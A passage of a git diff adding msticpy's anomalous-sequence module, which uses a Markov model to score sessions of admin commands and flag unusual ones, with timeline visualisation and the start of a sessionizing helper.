-from . msticpy._version import VERSION as __version__
+from .._version import VERSION
+
+__version__ = VERSION
diff --git a/msticpy/analysis/anomalous_sequence/__init__.py b/msticpy/analysis/anomalous_sequence/__init__.py
new file mode 100644
index 000000000..a9201c632
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/__init__.py
@@ -0,0 +1,10 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MSTIC Anomalous Sequence Modelling Tools."""
+
+from ..._version import VERSION
+
+__version__ = VERSION
diff --git a/msticpy/analysis/anomalous_sequence/anomalous.py b/msticpy/analysis/anomalous_sequence/anomalous.py
new file mode 100644
index 000000000..5b119de52
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/anomalous.py
@@ -0,0 +1,220 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Wrapper module for Model class for modelling sessions.
+
+In particular, this module is for both modelling and visualising your session data.
+"""
+
+import pandas as pd
+
+from ...nbtools import timeline
+from .model import Model
+from ...common.exceptions import MsticpyException
+
+
+def score_sessions(
+    data: pd.DataFrame, session_column: str, window_length: int
+) -> pd.DataFrame:
+    """
+    Model sessions using a sliding window approach within a markov model.
+
+    Parameters
+    ----------
+    data: pd.DataFrame
+        Dataframe which contains at least a column for sessions
+    session_column: str
+        name of the column which contains the sessions
+        The values in the session column should take one of the following formats:
+
+        1) ['Set-User', 'Set-Mailbox']
+        2) [Cmd(name='Set-User', params={'Identity', 'Force'}),
+           Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+        3) [Cmd(name='Set-User',
+           params={'Identity': 'blahblah', 'Force': 'true'}),
+           Cmd(name='Set-Mailbox',
+           params={'Identity': 'blahblah', 'AuditEnabled': 'false'})]
+
+        The Cmd datatype can be accessed from
+        anomalous_sequence.utils.data_structures.Cmd
+    window_length: int
+        length of the sliding window to use when computing the likelihood
+        metrics for each session.
+        This should be set to an integer >= 2. Note that sessions which have
+        fewer commands than the chosen window_length + 1 will end up with a
+        np.nan score. (The + 1 is because we append a dummy `end_token` to each
+        session before starting the sliding window, so a session of length 2,
+        would be treated as length 3)
+
+    Returns
+    -------
+    input dataframe with two additional columns appended.
+
+    """
+    if not isinstance(data, pd.DataFrame):
+        raise MsticpyException("`data` should be a pandas dataframe")
+    if session_column not in data.columns:
+        raise MsticpyException(f'"{session_column}" should be a column in the `data`')
+
+    sessions_df = data.copy()
+    sessions = sessions_df[session_column].values.tolist()
+
+    model = Model(sessions=sessions)
+    model.train()
+    model.compute_rarest_windows(
+        window_len=window_length, use_geo_mean=False, use_start_end_tokens=True
+    )
+
+    sessions_df[
+        f"rarest_window{window_length}_likelihood"
+    ] = model.rare_window_likelihoods[window_length]
+    sessions_df[f"rarest_window{window_length}"] = model.rare_windows[window_length]
+
+    return sessions_df
+
+
+# pylint: disable=too-many-arguments
+def visualise_scored_sessions(
+    data_with_scores: pd.DataFrame,
+    time_column: str,
+    score_column: str,
+    window_column: str,
+    score_upper_bound: float = None,
+    source_columns: list = None,
+):
+    """
+    Visualise the scored sessions on an interactive timeline.
+
+    Parameters
+    ----------
+    data_with_scores: pd.DataFrame
+        Dataframe which contains at least columns for time,
+        session score, window representing the session
+    time_column: str
+        name of the column which contains a timestamp
+    score_column: str
+        name of the column which contains a numerical score for each
+        of the sessions
+    window_column: str
+        name of the column which contains a representation of each of the sessions.
+        This representation will appear in the tooltips in the figure.
+        For example, it could be the rarest window of the session,
+        or the full session etc.
+    score_upper_bound: float, optional
+        an optional upper bound on the score for the visualisation figure.
+        This can help to zoom in on the more anomalous sessions
+    source_columns: list, optional
+        an optional list of source columns to include in the tooltips
+        in the visualisation.
+        Note, the content of each of these columns should be json serializable
+        in order to be compatible with the figure
+
+    Returns
+    -------
+    figure
+
+    """
+    scored_sessions = data_with_scores.copy()  # so we don't affect input dataframe
+    scored_sessions[window_column] = scored_sessions[window_column].apply(
+        lambda x: [str(cmd) for cmd in x]
+    )  # so it
+    # becomes json serializable for the figure
+    scored_sessions["time_col"] = scored_sessions[time_column].astype(
+        str
+    )  # so it appears nicely in the figure
+    # tooltips
+
+    if score_upper_bound is None:
+        score_upper_bound = scored_sessions[score_column].max()
+
+    if source_columns is None:
+        source_columns = []
+    source_columns += [score_column, window_column, "time_col"]
+    source_columns = list(set(source_columns))
+
+    timeline.display_timeline_values(
+        data=scored_sessions.loc[scored_sessions[score_column] <= score_upper_bound],
+        y=score_column,
+        time_column=time_column,
+        source_columns=source_columns,
+        kind="circle",
+    )
+
+
+# pylint: disable=too-many-arguments
+def score_and_visualise_sessions(
+    data: pd.DataFrame,
+    session_column: str,
+    window_length: int,
+    time_column: str,
+    likelihood_upper_bound: float = None,
+    source_columns: list = None,
+):
+    """
+    Model sessions and then produces an interactive timeline visualisation plot.
+
+    In particular, the sessions are modelled using a sliding window approach
+    within a markov model. The visualisation plot has time on the x-axis and
+    the modelled session likelihood metric on the y-axis.
+
+    Parameters
+    ----------
+    data: pd.DataFrame
+        Dataframe which contains at least columns for time and sessions
+    session_column: str
+        name of the column which contains the sessions
+        The values in the session column should take one of the following formats:
+
+        1) ['Set-User', 'Set-Mailbox']
+        2) [Cmd(name='Set-User', params={'Identity', 'Force'}),
+           Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+        3) [Cmd(name='Set-User',
+           params={'Identity': 'blahblah', 'Force': 'true'}),
+           Cmd(name='Set-Mailbox',
+           params={'Identity': 'blahblah', 'AuditEnabled': 'false'})]
+
+        The Cmd datatype can be accessed from
+        seqeunce.utils.data_structures.Cmd
+    window_length: int
+        length of the sliding window to use when computing the
+        likelihood metrics for each session.
+
+        This should be set to an integer >= 2.
+        Note that sessions which have fewer commands than the chosen
+        window_length + 1 will not appear in the visualisation. (The + 1 is
+        because we append a dummy `end_token` to each session before starting
+        the sliding window, so a session of length 2, would be treated as length
+        3)
+    time_column: str
+        name of the column which contains a timestamp
+    likelihood_upper_bound: float, optional
+        an optional upper bound on the likelihood metrics for the visualisation
+        plot. This can help to zoom in on the more anomalous sessions
+    source_columns: list, optional
+        An optional list of source columns to include in the tooltips
+        in the visualisation.
+        Note, the content of each of these columns should be json
+        serializable in order to be compatible with the figure
+
+    Returns
+    -------
+    figure
+
+    """
+    scored_sessions = score_sessions(
+        data=data, session_column=session_column, window_length=window_length
+    )
+    score_column = f"rarest_window{window_length}_likelihood"
+    window_column = f"rarest_window{window_length}"
+
+    visualise_scored_sessions(
+        data_with_scores=scored_sessions,
+        time_column=time_column,
+        score_column=score_column,
+        window_column=window_column,
+        score_upper_bound=likelihood_upper_bound,
+        source_columns=source_columns,
+    )
diff --git a/msticpy/analysis/anomalous_sequence/model.py b/msticpy/analysis/anomalous_sequence/model.py
new file mode 100644
index 000000000..c89cf803a
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/model.py
@@ -0,0 +1,712 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for Model class for modelling sessions data."""
+
+from collections import defaultdict
+from typing import List, Union, Dict
+
+from .utils.data_structures import Cmd
+from .utils import cmds_only, cmds_params_only, cmds_params_values, probabilities
+from ...common.exceptions import MsticpyException
+
+
+# pylint: disable=too-many-instance-attributes
+# pylint: disable=too-few-public-methods
+class Model:
+    """Class for modelling sessions data."""
+
+    def __init__(
+        self, sessions: List[List[Union[str, Cmd]]], modellable_params: set = None
+    ):
+        """
+        Instantiate the Model class.
+
+        This Model class can be used to model sessions, where each
+        session is a sequence of commands. We use a sliding window
+        approach to calculate the rarest part of each session. We
+        can view the sessions in ascending order of this metric to
+        see if the top sessions are anomalous/malicious.
+
+        Parameters
+        ----------
+        sessions: List[List[Union[str, Cmd]]]
+            list of sessions, where each session is a list of either
+            strings or a list of the Cmd datatype.
+
+            The Cmd datatype should have "name" and "params" as attributes
+            where "name" is the name of the command (string) and "params"
+            is either a set of accompanying params or a dict of
+            accompanying params and values.
+
+            examples formats of a session:
+            1) ['Set-User', 'Set-Mailbox']
+            2) [Cmd(name='Set-User', params={'Identity', 'Force'}),
+            Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+            3) [Cmd(name='Set-User',
+            params={'Identity': 'blahblah', 'Force': 'true'}),
+            Cmd(name='Set-Mailbox',
+            params={'Identity': 'blahblah', 'AuditEnabled': 'false'})]
+
+        modellable_params: set, optional
+            set of params which you deem to have categorical values which are suitable
+            for modelling.
+            Note this argument will only have an effect if your sessions include commands,
+            params and values. If your sessions include commands, params and values and
+            this argument is not set, then some rough heuristics will be used to determine
+            which params have values which are suitable for modelling.
+
+        """
+        if not isinstance(sessions, list):
+            raise MsticpyException("`sessions` should be a list")
+        if not sessions:
+            raise MsticpyException("`sessions` should not be an empty list")
+        for i, ses in enumerate(sessions):
+            if not isinstance(ses, list):
+                raise MsticpyException("each session in `sessions` should be a list")
+            if len(ses) == 0:
+                raise MsticpyException(
+                    f"session at index {i} of `sessions` is empty. Each session "
+                    "should contain at least one command"
+                )
+
+        self.start_token = "##START##"
+        self.end_token = "##END##"
+        self.unk_token = "##UNK##"
+
+        self.sessions = sessions
+        self.session_type = None
+        self._asses_input()
+
+        # non laplace smoothed counts
+        self._seq1_counts = None
+        self._seq2_counts = None
+        self._param_counts = None
+        self._cmd_param_counts = None
+        self._value_counts = None
+        self._param_value_counts = None
+
+        # laplace smoothed counts
+        self.seq1_counts = None
+        self.seq2_counts = None
+        self.param_counts = None
+        self.cmd_param_counts = None
+        self.value_counts = None
+        self.param_value_counts = None
+
+        self.modellable_params = modellable_params
+
+        self.prior_probs = None
+        self.trans_probs = None
+        self.param_probs = None
+        self.param_cond_cmd_probs = None
+        self.value_probs = None
+        self.value_cond_param_probs = None
+
+        self.set_params_cond_cmd_probs = {}  # type: Dict[str, Dict[str, float]]
+
+        self.session_likelihoods = None
+        self.session_geomean_likelihoods = None
+
+        self.rare_windows = {}  # type: Dict[int, list]
+        self.rare_window_likelihoods = {}  # type: Dict[int, list]
+
+        self.rare_windows_geo = {}  # type: Dict[int, list]
+        self.rare_window_likelihoods_geo = {}  # type: Dict[int, list]
+
+    def train(self):
+        """
+        Train the model by computing counts and probabilities.
+
+        In particular, computes the counts and probabilities of the commands
+        (and possibly the params if provided, and possibly the values if provided)
+
+        """
+        self._compute_counts()
+        self._laplace_smooth_counts()
+        self._compute_probs()
+
+    def compute_scores(self, use_start_end_tokens: bool):
+        """
+        Compute some likelihood based scores/metrics for each of the sessions.
+
+        In particular, computes the likelihoods and geometric mean of
+        the likelihoods for each of the sessions. Also, uses the sliding
+        window approach to compute the rarest window likelihoods for each
+        of the sessions. It does this for windows of length 2 and 3.
+
+        Note that if we have a session of length k, and we use a sliding
+        window of length k+1, then we will end up with np.nan for the
+        rarest window likelihood metric for that session.
+        However, if `use_start_end_tokens` is set to True, then
+        because we will be appending self.end_token to the session,
+        the session will be treated as a session of length k+1,
+        therefore, we will end up with a non np.nan value for that session.
+
+        Parameters
+        ----------
+        use_start_end_tokens: bool
+            if True, then self.start_token and self.end_token will be
+            prepended and appended to each
+            of the sessions respectively before the calculations are done.
+
+        """
+        if self.prior_probs is None:
+            raise MsticpyException(
+                "please train the model first before using this method"
+            )
+        self.compute_likelihoods_of_sessions(use_start_end_tokens=use_start_end_tokens)
+        self.compute_geomean_lik_of_sessions()
+        self.compute_rarest_windows(
+            window_len=2, use_geo_mean=False, use_start_end_tokens=use_start_end_tokens
+        )
+        self.compute_rarest_windows(
+            window_len=3, use_geo_mean=False, use_start_end_tokens=use_start_end_tokens
+        )
+
+    def _compute_counts(self):
+        """
+        Compute all the counts for the model.
+
+        The items we will count depend on the the `session_type` attribute.
+        We will compute the individual command and transition command counts.
+
+        If params are provided with the commands, then, in addition,
+        we will compute the individual param counts and param conditional
+        on the command counts.
+
+        If values are provided with the params, then in addition, we
+        will compute the individual value counts and value conditional
+        on the param counts. Also, we will use rough heuristics
+        to determine which params take categorical values, and hence
+        have modellable values.
+
+        """
+        if self.session_type is None:
+            raise MsticpyException("session_type attribute should not be None")
+
+        if self.session_type == SessionType.cmds_only:
+            seq1_counts, seq2_counts = cmds_only.compute_counts(
+                sessions=self.sessions,
+                start_token=self.start_token,
+                end_token=self.end_token,
+                unk_token=self.unk_token,
+            )
+            self._seq1_counts = seq1_counts
+            self._seq2_counts = seq2_counts
+
+        elif self.session_type == SessionType.cmds_params_only:
+            (
+                seq1_counts,
+                seq2_counts,
+                param_counts,
+                cmd_param_counts,
+            ) = cmds_params_only.compute_counts(
+                sessions=self.sessions,
+                start_token=self.start_token,
+                end_token=self.end_token,
+            )
+
+            self._seq1_counts = seq1_counts
+            self._seq2_counts = seq2_counts
+            self._param_counts = param_counts
+            self._cmd_param_counts = cmd_param_counts
+
+        elif self.session_type == SessionType.cmds_params_values:
+            (
+                seq1_counts,
+                seq2_counts,
+                param_counts,
+                cmd_param_counts,
+                value_counts,
+                param_value_counts,
+            ) = cmds_params_values.compute_counts(
+                sessions=self.sessions,
+                start_token=self.start_token,
+                end_token=self.end_token,
+            )
+
+            if self.modellable_params is None:
+                modellable_params = cmds_params_values.get_params_to_model_values(
+                    param_counts=param_counts, param_value_counts=param_value_counts
+                )
+                self.modellable_params = modellable_params
+
+            self._seq1_counts = seq1_counts
+            self._seq2_counts = seq2_counts
+            self._param_counts = param_counts
+            self._cmd_param_counts = cmd_param_counts
+            self._value_counts = value_counts
+            self._param_value_counts = param_value_counts
+
+    def _laplace_smooth_counts(self):
+        """
+        Laplace smooth all the counts for the model.
+
+        We do this by adding 1 to all the counts. This is so we shift
+        some of the probability mass from the very probable
+        commands/params/values to the unseen and very unlikely
+        commands/params/values. The `unk_token` means we can handle
+        unseen commands, params, values, sequences of commands.
+
+        """
+        if self._seq1_counts is None:
+            raise MsticpyException("Please run the _compute_counts method first.")
+
+        if self.session_type == SessionType.cmds_only:
+            seq1_counts_ls, seq2_counts_ls = cmds_only.laplace_smooth_counts(
+                seq1_counts=self._seq1_counts,
+                seq2_counts=self._seq2_counts,
+                start_token=self.start_token,
+                end_token=self.end_token,
+                unk_token=self.unk_token,
+            )
+            self.seq1_counts = seq1_counts_ls
+            self.seq2_counts = seq2_counts_ls
+
+        elif self.session_type == SessionType.cmds_params_only:
+            (
+                seq1_counts_ls,
+                seq2_counts_ls,
+                param_counts_ls,
+                cmd_param_counts_ls,
+            ) = cmds_params_only.laplace_smooth_counts(
+                seq1_counts=self._seq1_counts,
+                seq2_counts=self._seq2_counts,
+                param_counts=self._param_counts,
+                cmd_param_counts=self._cmd_param_counts,
+                start_token=self.start_token,
+                end_token=self.end_token,
+                unk_token=self.unk_token,
+            )
+
+            self.seq1_counts = seq1_counts_ls
+            self.seq2_counts = seq2_counts_ls
+            self.param_counts = param_counts_ls
+            self.cmd_param_counts = cmd_param_counts_ls
+
+        elif self.session_type == SessionType.cmds_params_values:
+            (
+                seq1_counts_ls,
+                seq2_counts_ls,
+                param_counts_ls,
+                cmd_param_counts_ls,
+                value_counts_ls,
+                param_value_counts_ls,
+            ) = cmds_params_values.laplace_smooth_counts(
+                seq1_counts=self._seq1_counts,
+                seq2_counts=self._seq2_counts,
+                param_counts=self._param_counts,
+                cmd_param_counts=self._cmd_param_counts,
+                value_counts=self._value_counts,
+                param_value_counts=self._param_value_counts,
+                start_token=self.start_token,
+                end_token=self.end_token,
+                unk_token=self.unk_token,
+            )
+            self.seq1_counts = seq1_counts_ls
+            self.seq2_counts = seq2_counts_ls
+            self.param_counts = param_counts_ls
+            self.cmd_param_counts = cmd_param_counts_ls
+            self.value_counts = value_counts_ls
+            self.param_value_counts = param_value_counts_ls
+
+    def _compute_probs(self):
+        """
+        Compute all the probabilities for the model.
+
+        The probabilities we compute depends on the `session_type` attribute.
+        We will compute the individual command and transition
+        command probabilities.
+
+        If params are provided with the commands, then, in addition,
+        we will compute the individual param probabilities and param
+        conditional on the command probabilities.
+
+        If values are provided with the params, then in addition,
+        we will compute the individual value probabilities and
+        value conditional on the param probabilities.
+
+        """
+        self._compute_probs_cmds()
+        if self.session_type in [
+            SessionType.cmds_params_only,
+            SessionType.cmds_params_values,
+        ]:
+            self._compute_probs_params()
+        if self.session_type == SessionType.cmds_params_values:
+            self._compute_probs_values()
+
+    def compute_setof_params_cond_cmd(self, use_geo_mean: bool):  # noqa: MC0001
+        """
+        Compute likelihood of combinations of params conditional on the cmd.
+
+        In particular, go through each command from each session and
+        compute the probability of that set of params (and values if provided)
+        appearing conditional on the command.
+
+        This can help us to identify unlikely combinations of params
+        (and values if provided) for each distinct command.
+
+        Note, this method is only available if each session is a list
+        of the Cmd datatype. It will result in an Exception if you
+        try and use it when each session is a list of strings.
+
+        Parameters
+        ----------
+        use_geo_mean: bool
+            if True, then the probabilities will be raised to
+            the power of (1/K)
+
+            case1: we have only params:
+                Then K is the number of distinct params which appeared
+                for the given cmd across all the sessions.
+            case2: we have params and values:
+                Then K is the number of distinct params which appeared
+                for the given cmd across all the sessions + the number
+                of values which we included in the modelling for this cmd.
+
+        """
+        if self.param_probs is None:
+            raise MsticpyException(
+                "please train the model first before using this method"
+            )
+
+        if self.session_type is None:
+            raise MsticpyException("session_type attribute should not be None")
+
+        if self.session_type == SessionType.cmds_only:
+            raise MsticpyException(
+                'this method is not available for your type of input data "sessions"'
+            )
+        if self.session_type == SessionType.cmds_params_only:
+            result = defaultdict(lambda: defaultdict(lambda: 0))
+            for ses in self.sessions:
+                for cmd in ses:
+                    c_name = cmd.name
+                    params = cmd.params
+                    prob = cmds_params_only.compute_prob_setofparams_given_cmd(
+                        cmd=c_name,
+                        params=params,
+                        param_cond_cmd_probs=self.param_cond_cmd_probs,
+                        use_geo_mean=use_geo_mean,
+                    )
+                    result[c_name][tuple(params)] = prob
+            self.set_params_cond_cmd_probs = result
+        else:
+            result = defaultdict(lambda: defaultdict(lambda: 0))
+            for ses in self.sessions:
+                for cmd in ses:
+                    c_name = cmd.name
+                    params = cmd.params
+                    pars = set(cmd.params.keys())
+                    intersection_pars = pars.intersection(self.modellable_params)
+                    key = set()
+                    for par in pars:
+                        if par in intersection_pars:
+                            key.add(f"{par} --- {params[par]}")
+                        else:
+                            key.add(par)
+                    prob = cmds_params_values.compute_prob_setofparams_given_cmd(
+                        cmd=c_name,
+                        params_with_vals=params,
+                        param_cond_cmd_probs=self.param_cond_cmd_probs,
+                        value_cond_param_probs=self.value_cond_param_probs,
+                        modellable_params=self.modellable_params,
+                        use_geo_mean=use_geo_mean,
+                    )
+                    result[c_name][tuple(key)] = prob
+            self.set_params_cond_cmd_probs = result
+
+    def compute_likelihoods_of_sessions(self, use_start_end_tokens: bool = True):
+        """
+        Compute the likelihoods for each of the sessions.
+
+        Note: If the lengths (number of commands) of the sessions vary a lot,
+        then you may not be able to fairly compare the likelihoods between a
+        long session and a short session. This is because longer sessions
+        involve multiplying more numbers together which are between 0 and 1.
+        Therefore the length of the session will be negatively correlated with
+        the likelihoods. If you take the geometric mean of the likelihood, then
+        you can compare the likelihoods more fairly across different session
+        lengths
+
+        Parameters
+        ----------
+        use_start_end_tokens: bool
+            if True, then `start_token` and `end_token` will be prepended
+            and appended to the session respectively before the calculations
+            are done
+
+        """
+        if self.prior_probs is None:
+            raise MsticpyException(
+                "please train the model first before using this method"
+            )
+
+        result = []
+
+        for sess in self.sessions:
+            if self.session_type == SessionType.cmds_only:
+                tmp = cmds_only.compute_likelihood_window(
+                    window=sess,
+                    prior_probs=self.prior_probs,
+                    trans_probs=self.trans_probs,
+                    use_start_token=use_start_end_tokens,
+                    use_end_token=use_start_end_tokens,
+                    start_token=self.start_token,
+                    end_token=self.end_token,
+                )
+            elif self.session_type == SessionType.cmds_params_only:
+                tmp = cmds_params_only.compute_likelihood_window(
+                    window=sess,
+                    prior_probs=self.prior_probs,
+                    trans_probs=self.trans_probs,
+                    param_cond_cmd_probs=self.param_cond_cmd_probs,
+                    use_start_token=use_start_end_tokens,
+                    use_end_token=use_start_end_tokens,
+                    start_token=self.start_token,
+                    end_token=self.end_token,
+                )
+            else:
+                tmp = cmds_params_values.compute_likelihood_window(
+                    window=sess,
+                    prior_probs=self.prior_probs,
+                    trans_probs=self.trans_probs,
+                    param_cond_cmd_probs=self.param_cond_cmd_probs,
+                    value_cond_param_probs=self.value_cond_param_probs,
+                    modellable_params=self.modellable_params,
+                    use_start_token=use_start_end_tokens,
+                    use_end_token=use_start_end_tokens,
+                    start_token=self.start_token,
+                    end_token=self.end_token,
+                )
+
+            result.append(tmp)
+
+        self.session_likelihoods = result
+
+    def compute_geomean_lik_of_sessions(self):
+        """
+        Compute the geometric mean of the likelihood for each of the sessions.
+
+        This is done by raising the likelihood of the session to the power of
+        (1 / k) where k is the length of the session.
+
+        Note: If the lengths (number of commands) of the sessions vary a lot,
+        then you may not be able to fairly compare the likelihoods between a
+        long session and a short session. This is because longer sessions
+        involve multiplying more numbers together which are between 0 and 1.
+        Therefore the length of the session will be negatively correlated with
+        the likelihoods. If you take the geometric mean of the likelihood, then
+        you can compare the likelihoods more fairly across different session
+        lengths.
+
+        """
+        if self.session_likelihoods is None:
+            self.compute_likelihoods_of_sessions()
+        result = [
+            self.session_likelihoods[idx] ** (1 / len(session))
+            for idx, session in enumerate(self.sessions)
+        ]
+
+        self.session_geomean_likelihoods = result
+
+    def compute_rarest_windows(
+        self,
+        window_len: int,
+        use_start_end_tokens: bool = True,
+        use_geo_mean: bool = False,
+    ):
+        """
+        Find the rarest window and corresponding likelihood for each session.
+
+        In particular, uses a sliding window approach to find the rarest window
+        and corresponding likelihood for that window for each session.
+
+        If we have a long session filled with benign activity except for a small
+        window of suspicious behaviour, then this approach should be able to
+        identity the session as anomalous. This approach should be more
+        effective than simply taking the geometric mean of the full session
+        likelihood. This is because the small window of suspicious behaviour
+        might get averaged out by the majority benign behaviour in the session
+        when using the geometric mean approach.
+
+        Note that if we have a session of length k, and we use a sliding window
+        of length k+1, then we will end up with np.nan for the rarest window
+        likelihood metric for that session. However, if `use_start_end_tokens`
+        is set to True, then because we will be appending self.end_token to the
+        session, the session will be treated as a session of length k+1,
+        therefore, we will end up with a non np.nan value.
+
+        Parameters
+        ----------
+        window_len: int
+            length of sliding window for likelihood calculations
+        use_start_end_tokens: bool
+            if True, then `start_token` and `end_token` will be prepended
+            and appended to each
+            session respectively before the calculations are done
+        use_geo_mean: bool
+            if True, then each of the likelihoods of the sliding windows
+            will be raised to the power
+            of (1/`window_len`)
+
+        """
+        if self.prior_probs is None:
+            raise MsticpyException(
+                "please train the model first before using this method"
+            )
+
+        if self.session_type == SessionType.cmds_only:
+            rare_tuples = [
+                cmds_only.rarest_window_session(
+                    session=ses,
+                    prior_probs=self.prior_probs,
+                    trans_probs=self.trans_probs,
+                    window_len=window_len,
+                    use_start_end_tokens=use_start_end_tokens,
+                    start_token=self.start_token,
+                    end_token=self.end_token,
+                    use_geo_mean=use_geo_mean,
+                )
+                for ses in self.sessions
+            ]
+        elif self.session_type == SessionType.cmds_params_only:
+            rare_tuples = [
+                cmds_params_only.rarest_window_session(
+                    session=ses,
+                    prior_probs=self.prior_probs,
+                    trans_probs=self.trans_probs,
+                    param_cond_cmd_probs=self.param_cond_cmd_probs,
+                    window_len=window_len,
+                    use_start_end_tokens=use_start_end_tokens,
+                    start_token=self.start_token,
+                    end_token=self.end_token,
+                    use_geo_mean=use_geo_mean,
+                )
+                for ses in self.sessions
+            ]
+        else:
+            rare_tuples = [
+                cmds_params_values.rarest_window_session(
+                    session=ses,
+                    prior_probs=self.prior_probs,
+                    trans_probs=self.trans_probs,
+                    param_cond_cmd_probs=self.param_cond_cmd_probs,
+                    value_cond_param_probs=self.value_cond_param_probs,
+                    modellable_params=self.modellable_params,
+                    window_len=window_len,
+                    use_start_end_tokens=use_start_end_tokens,
+                    start_token=self.start_token,
+                    end_token=self.end_token,
+                    use_geo_mean=use_geo_mean,
+                )
+                for ses in self.sessions
+            ]
+
+        if use_geo_mean:
+            self.rare_windows_geo[window_len] = [rare[0] for rare in rare_tuples]
+            self.rare_window_likelihoods_geo[window_len] = [
+                rare[1] for rare in rare_tuples
+            ]
+        else:
+            self.rare_windows[window_len] = [rare[0] for rare in rare_tuples]
+            self.rare_window_likelihoods[window_len] = [rare[1] for rare in rare_tuples]
+
+    def _compute_probs_cmds(self):
+        """Compute the individual and transition command probabilties."""
+        if self.seq1_counts is None:
+            raise MsticpyException("seq1_counts attribute should not be None")
+        if self.seq2_counts is None:
+            raise MsticpyException("seq2_counts attribute should not be None")
+
+        prior_probs, trans_probs = probabilities.compute_cmds_probs(
+            seq1_counts=self.seq1_counts,
+            seq2_counts=self.seq2_counts,
+            unk_token=self.unk_token,
+        )
+
+        self.prior_probs = prior_probs
+        self.trans_probs = trans_probs
+
+    def _compute_probs_params(self):
+        """Compute the individual param probs and param conditional on command probs."""
+        if self.param_counts is None:
+            raise MsticpyException("param_counts attribute should not be None")
+        if self.cmd_param_counts is None:
+            raise MsticpyException("cmd_param_counts attribute should not be None")
+
+        param_probs, param_cond_cmd_probs = probabilities.compute_params_probs(
+            param_counts=self.param_counts,
+            cmd_param_counts=self.cmd_param_counts,
+            seq1_counts=self.seq1_counts,
+            unk_token=self.unk_token,
+        )
+
+        self.param_probs = param_probs
+        self.param_cond_cmd_probs = param_cond_cmd_probs
+
+    def _compute_probs_values(self):
+        """Compute the individual value probs and value conditional on param probs."""
+        if self.value_counts is None:
+            raise MsticpyException("value_counts attribute should not be None")
+        if self.param_value_counts is None:
+            raise MsticpyException("param_value_counts attribute should not be None")
+
+        value_probs, value_cond_param_probs = probabilities.compute_values_probs(
+            value_counts=self.value_counts,
+            param_value_counts=self.param_value_counts,
+            unk_token=self.unk_token,
+        )
+
+        self.value_probs = value_probs
+        self.value_cond_param_probs = value_cond_param_probs
+
+    def _asses_input(self):
+        """
+        Determine what type of sessions we have.
+
+        In particular, assess the input `self.sessions` to see whether each
+        session is a list of strings, or list of the Cmd datatype. And if each
+        session is a list of the Cmd datatype, it will assess whether the params
+        attribute of the Cmd datatype is a set or a dict.
+
+        """
+        session = self.sessions[0]
+        cmd = session[0]
+        if isinstance(cmd, str):
+            self.session_type = SessionType.cmds_only
+        elif self._check_cmd_type():
+            if isinstance(cmd.params, set):
+                self.session_type = SessionType.cmds_params_only
+            elif isinstance(cmd.params, dict):
+                self.session_type = SessionType.cmds_params_values
+            else:
+                raise MsticpyException(
+                    "Params attribute of Cmd data structure should "
+                    + "be either a set or a dict"
+                )
+        else:
+            raise MsticpyException(
+                "Each element of 'sessions' should be a list of either "
+                + "strings, or Cmd data types"
+            )
+
+    def _check_cmd_type(self):
+        """Check whether the Cmd datatype has the expected attributes."""
+        session = self.sessions[0]
+        cmd = session[0]
+        if "name" in dir(cmd) and "params" in dir(cmd):
+            return True
+        return False
+
+
+class SessionType:
+    """Class for storing the types of accepted sessions."""
+
+    cmds_only = "cmds_only"
+    cmds_params_only = "cmds_params_only"
+    cmds_params_values = "cmds_params_values"
diff --git a/msticpy/analysis/anomalous_sequence/sessionize.py b/msticpy/analysis/anomalous_sequence/sessionize.py
new file mode 100644
index 000000000..8670fa259
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/sessionize.py
@@ -0,0 +1,202 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for creating sessions out of raw data."""
+
+from typing import List
+
+import numpy as np
+import pandas as pd
+from pandas.core.dtypes.dtypes import DatetimeTZDtype
+
+
+def sessionize_data(
+    data: pd.DataFrame,
+    user_identifier_cols: List[str],
+    time_col: str,
+    max_session_time_mins: int,
+    max_event_separation_mins: int,
+    event_col: str,
+) -> pd.DataFrame:
+    """
+    Sessionize the input data.
+
+    In particular, the resulting dataframe will have 1 row per session. It will contain the
+    following columns: the user_identifier_cols, <time_col>_min, <time_col>_max,
+    <event_col>_list, duration (<time_col>_max - <time_col>_min), number_events (length of the
+    <event_col>_list value)
+
+    Parameters
+    ----------
+    data: pd.DataFrame
+        This dataframe should contain at least the following columns:
+        - time stamp column
+        - columns related to user name and/or computer name and/or ip address etc
+        - column containing an event
+    user_identifier_cols: List[str]
+        Name of the columns which contain username and/or computer name and/or ip address etc.
+        Each time the value of one of these columns changes, a new session will be started.
+    time_col: str
+        Name of the column which contains a time stamp.
+        If this column is not already in datetime64[ns, UTC] format, it will be casted to it.
+    max_session_time_mins: int
+        The maximum length of a session in minutes. If a sequence of events for the same
+        user_identifier_cols values exceeds this length, then a new session will be started.
+    max_event_separation_mins: int
+        The maximum length in minutes between two events in a session. If we have 2 events for
+        the same user_identifier_cols values, and if those two events are more than
+        `max_event_separation_mins` apart, then a new session will be started.
+    event_col: str
+        Name of the column which contains the event of interest.
+        For example, if we are interested in sessionizing exchange admin commands,
+        the "event_col" could contain values like: "Set-Mailbox" or "Set-User" etc.
+
+    Returns
+    -------
+    pd.DataFrame containing the sessionized data. 1 row per session.
+
+    """
+    df_with_sesind = create_session_col(
+        data=data,
+        user_identifier_cols=user_identifier_cols,
+        time_col=time_col,
+        max_session_time_mins=max_session_time_mins,
+        max_event_separation_mins=max_event_separation_mins,
+    )
+
+    # aggregating will not work properly with nans. Temporarily replace nan values with dummy_str.
+    for col in user_identifier_cols:
+        df_with_sesind[col] = df_with_sesind[col].fillna("dummy_str")
+
+    # aggregate by the session_ind column
+    agg_df = (
